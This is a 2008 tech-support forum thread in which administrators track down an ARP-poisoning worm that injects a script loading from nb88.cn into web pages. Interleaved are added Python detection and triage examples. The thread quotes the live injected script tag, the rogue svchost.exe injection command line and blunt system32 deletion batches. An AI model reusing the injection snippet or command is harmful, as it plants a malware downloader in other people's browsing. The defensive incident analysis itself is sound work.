Solved

Fast Spreading infection, Unknown to all Virus, Spyware, Malware Cleaners

Posted on 2008-06-21
928 Views
Last Modified: 2013-11-22
We have an environment that quickly had a "Malware" infection.  Symptom is Internet Explorer Tab reads: "Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website.  We cannot clean nor find the source of the spreading.  Here is the Java Source:  <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I also have HijackThis logs from these if needed.
Question by:RTPIT
35 Comments
 

Author Comment

by:RTPIT
Do not click the link above, as it points to a known infected domain.

Author Comment

by:RTPIT
We have found that all machines connected (20ish) to the network, with the exception of 1, are experiencing the issue.  No other issues are being reported or found during investigation.

LVL 1

Expert Comment

by:adds21
We are also getting this on a number of networked machines.  Anyone have any ideas?  Thanks.

LVL 31

Expert Comment

by:moorhouselondon
This site identifies the problem, and elsewhere on the site suggests possible solutions:

http://malwaredomains.com/?p=223

Expert Comment

by:blueswitch
I have the same problem. Anybody have any ideas?

LVL 31

Expert Comment

by:moorhouselondon
A temporary fix can be had by creating an entry for nb88.cn in your Hosts file and redirecting it to 127.0.0.1.

http://www.mvps.org/winhelp2002/hosts.htm

Expert Comment

by:blueswitch
I have not been able to detect this with anything.

What is happening? Which server is infected, is it web or SQL, and where?

Thanks

Expert Comment

by:blueswitch
My problem is on my web servers; it's broadcasting the message to the world. That fix does not work on a server.

LVL 31

Expert Comment

by:moorhouselondon
That is true - but please bear in mind that this is someone else's question!  ;-))

What I suggest is that you post a new question into a more appropriate zone (server based, rather than client based), and I'm sure nobody would mind you linking the two questions together by posting cross references.

Otherwise people reading this are going to get confused!

Expert Comment

by:blueswitch
I posted the question under the Security/Misc group.

LVL 1

Expert Comment

by:adds21
I've copied this from my answer at http://www.experts-exchange.com/Security/Misc/Q_23505410.html, in case it's of use:

Okay.  We've now fixed our problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the Run regkey, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!

Author Comment

by:RTPIT
Thanks Adds21 we are working through our multiple SQL servers right now to find the culprit/culprits.

Expert Comment

by:alfiomar
I have the same problem, but SQL is not installed on the infected server. All sites on this machine have the same problem, ASP pages or HTML pages. I think IIS is corrupted. Thanks for help.

Expert Comment

by:yfactor
I have the same issue with one of our servers. Does anyone else know what the process was called?
Our server application only uses parameterized stored procedures for accessing the database; I don't see how it could have been vulnerable to an injection attack.

Expert Comment

by:blueswitch
See here:

http://www.experts-exchange.com/Security/Misc/Q_23505410.html

It was my post. The infection is on SQL; check all the SQL servers and check the Run regkey. You will see a process; kill it under Task Manager and remove it from startup and you will be OK.

Then use the Windows Malicious Software Removal Tool to scan them all and remove it.

Expert Comment

by:yfactor
Granted I'm no security expert - I don't even know what to look for when you say "check the run regkey" - but I haven't been able to see any evidence of a hack. I've scanned the system with AVG and found nothing. The server in question is a stand-alone with no other machines on the domain (and no trusts), and I have only had reports of the offensive page title coming from one network (the owners of the server we're managing). Is it possible that the worm could just be on their internal network and not on the Web server?

Expert Comment

by:ChiliMatt
I am working with a client who has the same issue.  Also with this issue is an inability to browse the web on some machines.  There are no MS SQL servers but there is the smaller engine as well.  Please help.
 

Author Comment

by:RTPIT
Chili-  We are in the process of narrowing it down currently.  It seems that any SQL engine is vulnerable.  How large is your network?

Expert Comment

by:ChiliMatt
RTPIT

The network is about 50 PCs.  About 10 are running the free version of MS SQL, but no full-blown SQL servers on the network.  Has anyone discovered the process to look for, or any virus scanner or malware scanner which detects this PITA?  What is weird is, on the machines that cannot connect to the internet, they cannot ping the gateway address, but they have access to all the internal applications and servers.  The ARP table sometimes shows the MAC address as all 0 and shows it as invalid.  Wireshark doesn't seem to show anything unusual from one of these machines either, although I am not real sure what to look for.  Any help would be appreciated.

Thanks!

Author Comment

by:RTPIT
We haven't found any processes running on the servers.  I have scoured them with a fine-tooth comb.  Just to make this more frustrating, if we install a wireless card into one of the "infected" machines and connect to our separate guest network, the problem disappears.  The best we can tell, this initial PITA is meant to download the real trouble but Symantec is blocking it.  I used Wireshark, IPView from MS (the former Sysinternals software), and a few open source utilities and found nothing.  I talked with our sister company, an ISP, and they had me try a simple netstat -an to see what ports each machine is listening on.  This didn't give me any answers, just more shots in the dark.

Expert Comment

by:ChiliMatt
RTPIT

Yep, same thing here.  We did the netstat right away but haven't found anything.  If we could at least locate which PC was causing the issue I might be able to get a clue, but this is really getting frustrating.  We even thought maybe our router was compromised and put in a new router.  The only clue we found was that if we spoofed the MAC address of a working machine on an "infected" machine then we could get out, so whatever is causing this is working at the MAC address level.  Nothing is showing up on Wireshark or any packet sniffer that looks odd to me or any of my staff.  I have suggested to shut every machine on the network down and bring them back up one by one, testing each one as it comes up to see if it causes the issues.

Also, we have the same issue with wireless that you do.  If we put a wireless card in a PC it is fine, most likely because the MAC address of the access point is okay for some reason.  I just don't know why or how this is possible.

Author Comment

by:RTPIT
Chili,

Do you have any machines that are not experiencing the issue?  We have a small handful of machines that are chugging along unaffected.  I have compared them at great lengths, but I haven't found anything that makes one vulnerable and one not.  If you have any ideas, feel free to bounce them off of us.  The environments we are in are very similar.

Expert Comment

by:ChiliMatt
RTPIT

We have some machines like yours that seem unaffected: they can browse the web just fine, but they still have F*** th3 W0rld! injected in the headers of their webpages.  BTW, changing the router has not helped us out at all either.

Expert Comment

by:blueswitch
All machines on your internal network will appear unaffected; that's the confusing part about this infection. It's an ARP attack: it changes the default gateway of the network to the infected machine via ARP.

A simple way to confirm this: take one of your infected machines and change the IP; it will look clean again.

There is one machine on the network with the ARP process running. Kill that, and all will be corrected.

Author Comment

by:RTPIT
Blueswitch-  Any ideas what the ARP process is?

Accepted Solution

by:stephenevans (earned 400 total points)
I've sorted this one; follow my link below to another post:

http://www.experts-exchange.com/Security/Misc/Q_23505410.html

You will find DLLs in your windows\system32 called:

<System>\drivers\npf.sys
<System>\packet.dll
<System>\wpcap.dll

Along with an EXE.  Those DLLs are network-level packet drivers; they give the EXE on the server the ability to listen and reply to all network traffic on the LAN regardless of whether it's destined for the infected server or not.  If you find any of the files above, search for all files created on that same day.

You will also notice that the server that is infected will have higher than normal traffic through the network card as it's messing with the ARP entries on your LAN; that's how it injects the "**** th3 w0rld!" title in web pages, as those pages are first traversing through the infected server.

St
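
What stephenevans and blueswitch describe (one host answering ARP on behalf of the gateway so that everyone else's HTTP traffic traverses it) can be confirmed from a packet capture without special tooling. The following is an added example, not code from this thread or from any of the posters: it decodes raw Ethernet/ARP frames with struct, builds a table of which MACs claimed which IPs in ARP replies, and reports any MAC that claims the gateway IP or answers for several IPs at once. The frames, the MAC addresses and the 192.168.5.0/24 subnet are constructed for the demo; on a real capture you would feed it the raw frames from a pcap reader.

```python
"""ARP-spoof triage over raw frames (added example; constructed data, not from the thread)."""
import struct
from collections import defaultdict

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_to_str(b):
    return ":".join(f"{x:02x}" for x in b)


def str_to_mac(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_to_str(b):
    return ".".join(str(x) for x in b)


def str_to_ip(s):
    return bytes(int(x) for x in s.split("."))


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet + ARP 'is-at' reply; used here only to construct sample traffic."""
    eth = ETH.pack(str_to_mac(target_mac), str_to_mac(sender_mac), ETHERTYPE_ARP)
    arp = ARP.pack(1, 0x0800, 6, 4, ARP_REPLY,
                   str_to_mac(sender_mac), str_to_ip(sender_ip),
                   str_to_mac(target_mac), str_to_ip(target_ip))
    return eth + arp


def parse_frame(frame):
    """Decode one frame; returns None for anything that is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, src, etype = ETH.unpack_from(frame, 0)
    if etype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "eth_src": mac_to_str(src), "sha": mac_to_str(sha),
            "spa": ip_to_str(spa), "tha": mac_to_str(tha), "tpa": ip_to_str(tpa)}


def find_arp_spoofers(frames, gateway_ip, gateway_mac=None, many_ips=3):
    """Look only at replies (the 'is-at' messages that poison caches).

    claims   : IP -> sorted MACs that claimed it
    reasons  : MAC -> why it is suspicious
    suspects : sorted MACs with at least one reason
    Without a trusted gateway_mac every MAC claiming the gateway IP is reported and
    the analyst compares against the router (or a known-clean host's arp -a).
    """
    claims = defaultdict(set)
    ips_per_mac = defaultdict(set)
    reasons = defaultdict(list)
    for frame in frames:
        pkt = parse_frame(frame)
        if pkt is None or pkt["op"] != ARP_REPLY:
            continue
        sha = pkt["sha"]
        if sha != pkt["eth_src"]:
            reasons[sha].append(f"ARP sender {sha} differs from Ethernet source {pkt['eth_src']}")
        if sha == "00:00:00:00:00:00":  # the 'all zero / invalid' entries mentioned in the thread
            reasons[sha].append(f"all-zero MAC claiming {pkt['spa']}")
        claims[pkt["spa"]].add(sha)
        ips_per_mac[sha].add(pkt["spa"])
    for mac in claims.get(gateway_ip, set()):
        if gateway_mac is None and len(claims[gateway_ip]) > 1:
            reasons[mac].append(f"one of {len(claims[gateway_ip])} MACs claiming gateway {gateway_ip}")
        elif gateway_mac is not None and mac != gateway_mac:
            reasons[mac].append(f"claims gateway {gateway_ip} but gateway is {gateway_mac}")
    for mac, ips in ips_per_mac.items():
        if len(ips) >= many_ips:  # one NIC answering for the subnet: the injecting host
            reasons[mac].append(f"answers for {len(ips)} IPs: {sorted(ips)}")
    return {"claims": {ip: sorted(m) for ip, m in claims.items()},
            "reasons": dict(reasons), "suspects": sorted(reasons)}


# Constructed sample: addresses are made up; 192.168.5.0/24 matches the range in the thread.
GW_IP, GW_MAC = "192.168.5.1", "00:11:22:33:44:01"
ATTACKER = "00:de:ad:be:ef:99"
SAMPLE_FRAMES = [
    arp_reply(GW_MAC, GW_IP, "00:11:22:33:44:20", "192.168.5.20"),    # real gateway answers .20
    arp_reply("00:11:22:33:44:20", "192.168.5.20", GW_MAC, GW_IP),    # .20 answers the gateway
    arp_reply(ATTACKER, GW_IP, "00:11:22:33:44:20", "192.168.5.20"),  # attacker 'is' the gateway to .20
    arp_reply(ATTACKER, GW_IP, "00:11:22:33:44:21", "192.168.5.21"),  # ... and to .21
    arp_reply(ATTACKER, "192.168.5.20", GW_MAC, GW_IP),               # attacker 'is' .20 to the gateway
    arp_reply(ATTACKER, "192.168.5.21", GW_MAC, GW_IP),               # ... and .21
]

if __name__ == "__main__":
    for mac, why in find_arp_spoofers(SAMPLE_FRAMES, GW_IP, GW_MAC)["reasons"].items():
        print(mac, "->", "; ".join(why))
```

The gateway's true MAC is something you read off the router or a known-clean machine's arp -a; without it the function can only report that two MACs disagree about who the gateway is. Whichever MAC ends up in suspects is the NIC to trace back to a switch port and a hostname, which is the "one machine on the network with the ARP process running" that blueswitch says to find.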

Expert Comment

by:blueswitch
Sorry, but when I saw the infection, I deleted it so quickly that I didn't write down what it was.

Expert Comment

by:stephenevans
In my case there was an .exe created at the same time as the DLLs, and that was called wapsrv.exe.

Expert Comment

by:blueswitch
That sounds familiar. This was an incredible attack; it took hours before we realized what it was, and we originally thought all machines were infected.

Author Comment

by:RTPIT
I found the culprit.  I made 2 scripts, one for 2000 and one for XP/Server:

2000.bat
rem Delete the files listed in stephenevans's post (Windows 2000 system directory)
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
rem Same files, Windows XP / Server system directory
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and deleted them, but eventually I found one machine with access denied on the deletion.  After looking over the processes, there was only one svchost.exe process run by the local user account; its switches were:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans

Author Comment

by:RTPIT
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Expert Comment

by:ChiliMatt
Yep we found the same thing RTPIT.  Our client is so freaked that they requested we wipe the machine for them and reload everything.

Expert Comment

by:ChiliMatt
Just another heads-up: the program we found was called arpinsert.exe, triggered from

HKEY_LOCAL_Machine\Software\Microsoft\Windows\CurrentVersion\Run

So there may be more variants of this nasty going around.

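
Pulling together the indicators reported across stephenevans's, RTPIT's and ChiliMatt's posts (WinPcap's npf.sys, packet.dll and wpcap.dll plus wanpacket.dll, wapsrv.exe, waptimes.exe and arpinsert.exe; the Run key entry; and the svchost.exe carrying -idx/-ip/-port/-insert switches), here is an added triage script. It is not RTPIT's batch file or anything else posted in the thread. It runs offline over exports collected from each machine: a CSV process list with command lines and parent PIDs, the reg query output for the Run key, and a dir /tc style listing. The samples embedded below are constructed; the PIDs, the "waptimes" value name, the qmfx9.dll companion file and the creation dates are made up, and the rogue command line is abbreviated from the one RTPIT posted.

```python
"""Host triage for the files, Run-key entry and rogue svchost.exe reported in this thread.
Added example: runs offline over constructed exports; it is not RTPIT's batch script."""
import csv
import io
import ntpath
import re

# File names reported on infected hosts: the three WinPcap components plus the droppers.
IOC_FILES = {"packet.dll", "wanpacket.dll", "wpcap.dll", "npf.sys",
             "wapsrv.exe", "waptimes.exe", "arpinsert.exe"}
# Switches seen on the rogue svchost.exe command line in the thread.
INJECT_SWITCHES = {"-idx", "-ip", "-port", "-insert"}
# A real svchost.exe is started by services.exe with '-k <group>' (newer Windows may add
# '-p' and '-s <service>'); anything else on its command line is worth a look.
LEGIT_SVCHOST = re.compile(r'^\s*"?[^"]*svchost(\.exe)?"?\s+-k\s+\S+(\s+-p)?(\s+-s\s+\S+)?\s*$', re.I)


def basename(path):
    return ntpath.basename(path.strip('"')).lower()


def triage_processes(csv_text):
    """csv_text: a process list with ProcessId, ParentProcessId, Name, ExecutablePath and
    CommandLine columns (e.g. Win32_Process piped to Export-Csv). Returns (pid, reason) pairs."""
    rows = list(csv.DictReader(io.StringIO(csv_text.strip())))
    by_pid = {r["ProcessId"]: r for r in rows}
    findings = []
    for r in rows:
        pid, name, cmd = r["ProcessId"], r["Name"].lower(), r["CommandLine"] or ""
        parent = by_pid.get(r["ParentProcessId"])
        parent_name = parent["Name"].lower() if parent else "<unknown>"
        if set(cmd.lower().split()) & INJECT_SWITCHES:
            findings.append((pid, f"injection switches on command line: {cmd}"))
        if name in IOC_FILES or basename(r["ExecutablePath"] or "") in IOC_FILES:
            findings.append((pid, f"known IOC binary: {r['ExecutablePath'] or name}"))
        if name == "svchost.exe":
            if parent_name != "services.exe":
                findings.append((pid, f"svchost.exe started by {parent_name}, not services.exe"))
            if not LEGIT_SVCHOST.match(cmd):
                findings.append((pid, "svchost.exe without the usual '-k <group>' arguments"))
    return findings


def triage_run_key(reg_query_text):
    """reg_query_text: `reg query` output for the HKLM ...\\CurrentVersion\\Run key.
    Returns (value name, data) for entries that launch a known IOC file."""
    hits = []
    for line in reg_query_text.splitlines():
        parts = re.split(r"\s{2,}", line.strip())  # reg query separates columns with 4 spaces
        if len(parts) == 3 and parts[1].startswith("REG_"):
            name, _type, data = parts
            exe = re.search(r'[^"\s]+\.exe', data, re.I)
            if exe and basename(exe.group(0)) in IOC_FILES:
                hits.append((name, data))
    return hits


def files_created_with_iocs(listing):
    """listing: (path, 'YYYY-MM-DD HH:MM' creation time) pairs, e.g. from `dir /tc`.
    Returns every file created on the same day as a known IOC file (the pivot
    stephenevans suggests), so companions with unknown names are not missed."""
    days = {created[:10] for path, created in listing if basename(path) in IOC_FILES}
    return sorted(path for path, created in listing if created[:10] in days)


# Constructed samples: PIDs, the 'waptimes' value name, qmfx9.dll and the dates are made up;
# the rogue command line is abbreviated from the one posted in the thread.
PROCESS_CSV = r'''
ProcessId,ParentProcessId,Name,ExecutablePath,CommandLine
4,0,System,,
600,4,services.exe,C:\WINDOWS\system32\services.exe,C:\WINDOWS\system32\services.exe
820,600,svchost.exe,C:\WINDOWS\system32\svchost.exe,C:\WINDOWS\system32\svchost.exe -k netsvcs
1444,600,svchost.exe,C:\WINDOWS\system32\svchost.exe,C:\WINDOWS\system32\svchost.exe -k NetworkService
1200,1100,explorer.exe,C:\WINDOWS\explorer.exe,C:\WINDOWS\Explorer.EXE
1900,1200,waptimes.exe,C:\WINDOWS\system32\waptimes.exe,C:\WINDOWS\system32\waptimes.exe
2016,1900,svchost.exe,C:\WINDOWS\system32\svchost.exe,"C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert ""<script src=http://nb88.cn/search/vip.js></script>"""
'''
RUN_KEY_TEXT = r'''
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    waptimes    REG_SZ    C:\WINDOWS\system32\waptimes.exe
'''
DIR_LISTING = [
    (r"C:\WINDOWS\system32\wpcap.dll", "2008-06-19 02:14"),
    (r"C:\WINDOWS\system32\packet.dll", "2008-06-19 02:14"),
    (r"C:\WINDOWS\system32\drivers\npf.sys", "2008-06-19 02:14"),
    (r"C:\WINDOWS\system32\waptimes.exe", "2008-06-19 02:15"),
    (r"C:\WINDOWS\system32\qmfx9.dll", "2008-06-19 02:16"),
    (r"C:\WINDOWS\system32\kernel32.dll", "2004-08-04 12:00"),
]

if __name__ == "__main__":
    for item in triage_processes(PROCESS_CSV) + triage_run_key(RUN_KEY_TEXT):
        print(item)
    print(files_created_with_iocs(DIR_LISTING))
```

The strongest signals are structural rather than name-based: a genuine svchost.exe is a child of services.exe and carries a -k group argument, so one started by another program with -ip/-port/-insert on its command line is rogue whatever directory it sits in. The three WinPcap files on their own are weaker evidence, because any machine with Wireshark or WinPcap installed carries the same npf.sys, packet.dll and wpcap.dll, and a deletion batch like the one above would remove a legitimate WinPcap too. Same-day creation time is the pivot for catching companion files whose names nobody in the thread wrote down.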
LVL 23

Assisted Solution

by:Admin3k (earned 100 total points)
I saw this the other day.

There is a machine on the network that is infected by a variant of the W32.ARPIFRAME worm:

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99

This is the original culprit, a low-profile worm that uses the WinPcap library to inject malicious HTML code into HTTP traffic across a switched network, using ARP poisoning attacks. The IFrames injected differ, but the payload is usually executing JS / VBS trojan downloaders. McAfee detects it as Trojan VBS/PSYME, Kaspersky detects it as Trojan-Downloader.JS.Multi.cn.

The trojan downloaders also use an unpatched vulnerability for Internet Explorer to auto-download from a list of Chinese sites and stealthily execute further malware.

Among the malware that was downloaded are several password stealer trojans, as well as an extremely nasty piece of malware (W32.Almanahe.C), which is a hybrid PE infector virus/worm/trojan/rootkit.

Microsoft has released an advisory / temp fix, which is to disable the ADODB.Stream object in Internet Explorer:

http://channel9.msdn.com/forums/Coffeehouse/11599-Official-Microsoft-security-fix-for-IE-vulnerability-ADODBStream/

Hope this helps.

Try running a protocol analyzer on your network; identify machines that are actively broadcasting / spoofing as the network gateway, OR intercept any traffic with the above text filter / URL.

Once you have cleaned up all the  from the ARPIFRAME infection machines,
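
Admin3k's suggestion to intercept traffic and filter for the injected text can be generalised: because the worm prepends its snippet to the response, anything that appears before <!DOCTYPE or <html, and a page that ends up with two <title> elements (the injected one is the one IE showed in the tab), is suspicious regardless of which domain the script points to. The following is an added example, not code from the thread: it splits a raw HTTP response, reports script tags that sit ahead of the document start, counts <title> elements, and sanity-checks Content-Length against the body. The responses are constructed; the prepended snippet is the one quoted in the question, with the title censored as the page shows it, and the page body is made up.

```python
"""Spot HTML prepended to an HTTP response in transit (added example, not from the thread).
The worm inserts '<script src=...></script><title>...</title>' ahead of the real page,
so the tell-tale is content before the document start and a second <title>."""
import re

DOC_START = re.compile(rb"<!doctype\b|<html\b", re.I)
SCRIPT_SRC = re.compile(rb"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
TITLE = re.compile(rb"<title\b[^>]*>(.*?)</title>", re.I | re.S)


def split_response(raw):
    """Split raw response bytes into (status line, header dict with lower-case names, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("response has no end-of-headers marker")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return lines[0].decode(errors="replace"), headers, body


def host_of(url):
    m = re.match(rb"https?://([^/:]+)", url, re.I)
    return m.group(1).decode().lower() if m else None


def scan_response(raw):
    """Return a list of human-readable findings; empty for a clean HTML response."""
    _status, headers, body = split_response(raw)
    findings = []
    if "text/html" not in headers.get("content-type", "").lower():
        return findings
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        # Generic sanity check: an in-path rewriter that does not fix up the length shows up here.
        # The thread does not say whether this worm adjusts it, so treat as a hint, not proof.
        findings.append(f"Content-Length {declared} but body is {len(body)} bytes")
    m = DOC_START.search(body)
    prefix = body[:m.start()] if m else body   # bytes ahead of <!DOCTYPE / <html
    for sm in SCRIPT_SRC.finditer(prefix):
        src = sm.group(1).decode(errors="replace")
        findings.append(f"script from {host_of(sm.group(1)) or 'relative'} before the document start: {src}")
    titles = [t.strip().decode(errors="replace") for t in TITLE.findall(body)]
    if len(titles) > 1:
        findings.append("more than one <title>: " + " | ".join(titles))
    return findings


def http_response(body, content_type=b"text/html"):
    """Assemble a minimal HTTP/1.1 200 response around body (sample-building helper)."""
    return (b"HTTP/1.1 200 OK\r\nContent-Type: " + content_type +
            b"\r\nContent-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


# Constructed samples. The prepended snippet is the one quoted in the question (title censored
# as the page shows it); the page body is made up.
PAGE = b"<HTML><HEAD><title>Intranet portal</title></HEAD><BODY>Hello</BODY></HTML>"
INJECTED_SNIPPET = (b'<script language="JavaScript" src="http://nb88.cn/search/vip.js"></script>'
                    b'<title>**** Th3 W0rld!</title> ')
CLEAN = http_response(PAGE)
INJECTED = http_response(INJECTED_SNIPPET + PAGE)

if __name__ == "__main__":
    print("clean:", scan_response(CLEAN))
    print("injected:", scan_response(INJECTED))
```

Run it over reassembled responses captured on a client's side of the switch (or on the suspected host itself, where all the traffic passes). Blocking nb88.cn in a hosts file, as suggested earlier in the thread, stops the script from loading on that one machine but does nothing about the injection, which is why the check keys on where the content sits in the response rather than on the domain it references.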
